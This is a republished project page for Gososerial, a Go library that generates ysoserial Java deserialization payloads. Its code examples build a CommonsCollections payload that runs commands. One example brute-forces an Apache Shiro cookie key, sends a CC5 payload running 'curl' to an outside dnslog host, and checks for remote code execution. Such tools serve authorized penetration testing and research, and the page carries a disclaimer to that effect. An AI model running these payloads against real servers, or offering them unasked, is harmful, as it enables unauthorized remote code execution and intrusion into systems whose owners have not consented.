Gososerial – Dynamically Generates Ysoserial’s Payload
2021-09-04 12:31:57 Author: reconshell.com(查看原文) 阅读量:68 收藏

Dynamically Generates Ysoserial’s Payload by Golang


Introduce

  • Ysoserial is a well-known tool for Java deserialization security
  • No Java environment and no need to download ysoserial.jar file
  • Enter the command to directly obtain the payload, which is convenient for writing security tools
  • Support CommonsCollections1-7,K1-K4,CommonsBeanutils1 Now

Example

CommonsCollections1 Payload

gososerial

List of Supported

support

Quick Start

go get github.com/EmYiQing/Gososerial
package main

import gososerial "github.com/EmYiQing/Gososerial"

func main()  {
	payload := gososerial.GetCC1("calc.exe")
	......
	sendPayload(payload)
	......
}

Example

func main() {
	// Shiro Scan Code
	target := "http://shiro_ip/"
	// Brust Shiro AES Key 
	key := shiro.CheckShiroKey(target)
	if key != "" {
		log.Info("find key: %s", key)
	}
	// Use CommonsCollections5 Payload
	var payload []byte
	payload = gososerial.GetCC5("curl xxxxx.ceye.io")
	// Send Cookies Encrypted By AES
	shiro.SendPayload(key, payload, target)
	// Receive Results Using Dnslog API
	if ceye.CheckResult("your_ceye_token") {
		log.Info("find shiro!")
	}
}

About

Refer to the code of master p in xray

ysoserial: https://github.com/frohoff/ysoserial

xray: https://github.com/chaitin/xray

phith0n: https://github.com/phith0n

Disclaimer

Unauthorized use of Gososerial to attack the target is illegal

This program should only be used for authorized security testing and research purposes.



文章来源: https://reconshell.com/gososerial-dynamically-generates-ysoserials-payload/
如有侵权请联系:admin#unsafe.sh